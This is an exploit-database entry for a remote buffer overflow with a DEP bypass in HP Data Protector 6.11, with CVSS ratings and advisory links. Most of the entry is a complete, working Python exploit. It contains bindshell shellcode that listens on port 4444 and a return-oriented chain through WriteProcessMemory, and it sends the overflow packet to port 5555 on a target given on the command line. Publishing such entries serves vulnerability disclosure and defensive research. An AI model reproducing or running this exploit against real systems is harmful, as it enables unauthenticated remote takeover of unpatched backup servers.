HP Data Protector 6.11 Remote Buffer Overflow + DEP Bypass

2011.07.03
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python # HP Data Protector 6.11 Remote Buffer Overflow # Tested on Windows 2003 R2 + DEP Enabled # Authors: muts & dookie # Reference: http://www.exploit-db.com/exploits/17458/ # Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities # http://www.offensive-security.com/0day/hp-dataprotector.py.txt import struct, socket, sys target = sys.argv[1] # bindshell - port 4444 shellcode = ("\xbf\x83\x75\x7f\xdd\xdb\xc8\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" "\x56\x31\x7e\x13\x03\x7e\x13\x83\xee\x7f\x97\x8a\x21\x97\xd1" "\x75\xda\x67\x82\xfc\x3f\x56\x90\x9b\x34\xca\x24\xef\x19\xe6" "\xcf\xbd\x89\x7d\xbd\x69\xbd\x36\x08\x4c\xf0\xc7\xbc\x50\x5e" "\x0b\xde\x2c\x9d\x5f\x00\x0c\x6e\x92\x41\x49\x93\x5c\x13\x02" "\xdf\xce\x84\x27\x9d\xd2\xa5\xe7\xa9\x6a\xde\x82\x6e\x1e\x54" "\x8c\xbe\x8e\xe3\xc6\x26\xa5\xac\xf6\x57\x6a\xaf\xcb\x1e\x07" "\x04\xbf\xa0\xc1\x54\x40\x93\x2d\x3a\x7f\x1b\xa0\x42\x47\x9c" "\x5a\x31\xb3\xde\xe7\x42\x00\x9c\x33\xc6\x95\x06\xb0\x70\x7e" "\xb6\x15\xe6\xf5\xb4\xd2\x6c\x51\xd9\xe5\xa1\xe9\xe5\x6e\x44" "\x3e\x6c\x34\x63\x9a\x34\xef\x0a\xbb\x90\x5e\x32\xdb\x7d\x3f" "\x96\x97\x6c\x54\xa0\xf5\xf8\x99\x9f\x05\xf9\xb5\xa8\x76\xcb" "\x1a\x03\x11\x67\xd3\x8d\xe6\x88\xce\x6a\x78\x77\xf0\x8a\x50" "\xbc\xa4\xda\xca\x15\xc4\xb0\x0a\x99\x11\x16\x5b\x35\xc9\xd7" "\x0b\xf5\xb9\xbf\x41\xfa\xe6\xa0\x69\xd0\x91\xe6\xa7\x00\xf2" "\x80\xc5\xb6\xe5\x0c\x43\x50\x6f\xbd\x05\xca\x07\x7f\x72\xc3" "\xb0\x80\x50\x7f\x69\x17\xec\x69\xad\x18\xed\xbf\x9e\xb5\x45" "\x28\x54\xd6\x51\x49\x6b\xf3\xf1\x00\x54\x94\x88\x7c\x17\x04" "\x8c\x54\xcf\xa5\x1f\x33\x0f\xa3\x03\xec\x58\xe4\xf2\xe5\x0c" "\x18\xac\x5f\x32\xe1\x28\xa7\xf6\x3e\x89\x26\xf7\xb3\xb5\x0c" "\xe7\x0d\x35\x09\x53\xc2\x60\xc7\x0d\xa4\xda\xa9\xe7\x7e\xb0" "\x63\x6f\x06\xfa\xb3\xe9\x07\xd7\x45\x15\xb9\x8e\x13\x2a\x76" "\x47\x94\x53\x6a\xf7\x5b\x8e\x2e\x07\x16\x92\x07\x80\xff\x47" "\x1a\xcd\xff\xb2\x59\xe8\x83\x36\x22\x0f\x9b\x33\x27\x4b\x1b" "\xa8\x55\xc4\xce\xce\xca\xe5\xda") wpm = "\x55\x23\xe4\x77" # 77E42355 WriteProcessMemory - Win2k3 wpm += "\x50\xd0\x4b\x00" # 004bd050 omniinet.exe - Return after WPM wpm += "\xff\xff\xff\xff" # hProcess wpm += "\x50\xd0\x4b\x00" # 004bd050 omniinet.exe - Address to Patch wpm += "\x41\x41\x41\x41" # lpBuffer placeholder (Shellcode Address) wpm += "\x42\x42\x42\x42" # nSize placeholder (Shellcode Size) 00001000 wpm += "\x38\xd4\x4b\x00" # 004BD438 omniinet.exe - Pointer for Written Bytes # pre packet = ("\x00\x00\x27\xCA\xFF\xFE\x32\x00\x00\x00\x20\x00\x61\x00\x00\x00" "\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00" "\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x32\x00\x30\x00\x00\x00" "\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00" "\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00" "\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00") # padding to EIP packet +="A"* 2004 # Get a copy of ESP into a register for safekeeping packet +="\x1f\x59\x37\x7c" # 0x7c37591f PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN packet += "\x44" * 4 # junk to pop into EBP # Jump over the WPM parameters packet += "\xfe\x9b\x35\x7c" # 0x7c359bfe : # ADD ESP,20 # RETN packet += wpm packet += "\x44" * 4 # filler # Get EAX to point at our shellcode on the stack and overwrite the placeholder packet += "\x40\xa0\x35\x7c" # 0x7c35a040 : # MOV EAX,ECX # RETN packet += "\x1c\x3b\x37\x7c" # 0x7c373b1c : # ADD EAX,100 # POP EBP # RETN packet += "\x44" * 4 # filler packet += "\xd4\x3d\x43\x00" # 0x00433dd4 : # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN ** [omniinet.exe] packet += "\x44" * 4 # filler # Craft the shellcode size in EAX and overwrite the placeholder packet += "\x2e\x40\x34\x7c" # 0x7c34402e : # POP EDX # RETN ** [MSVCR71.dll] packet += "\x59\x3d\x41\x41" # Value to SUB from EAX packet += "\x23\x62\x37\x7c" # 0x7c376223 : # POP EAX # RETN ** [MSVCR71.dll] packet += "\x41\x41\x41\x41" # To be the sub-ee 41413D59 packet += "\xe9\xfa\x36\x7c" # 0x7c36fae9 : # SUB EAX,EDX # POP ESI # RETN ** [MSVCR71.dll] packet += "\x44" * 4 # filler packet += "\x69\x60\x37\x7c" # 0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSVCR71.dll] packet += "\x44" * 12 # filler # Point ESP to WPM and the stack and return packet += "\x40\xa0\x35\x7c" # 0x7c35a040 : # MOV EAX,ECX # RETN ** [MSVCR71.dll] packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe] packet += "\x44" * 4 # filler packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe] packet += "\x44" * 4 # filler packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe] packet += "\x44" * 4 # filler packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe] packet += "\x44" * 4 # filler packet += "\x05\x8b\x34\x7c" # 0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll] packet += "\x45" * 8 packet +="\x90" *120 packet += shellcode packet +="C"* 980000 # post packet +=("\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00" "\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00" "\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00" "\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00" "\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00" "\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00") sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((target, 5555)) sock.send(packet) sock.close()

References:

http://xforce.iss.net/xforce/xfdb/68281
http://www.securityfocus.com/bid/48486
http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
http://securitytracker.com/id?1025731
http://secunia.com/advisories/45100
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top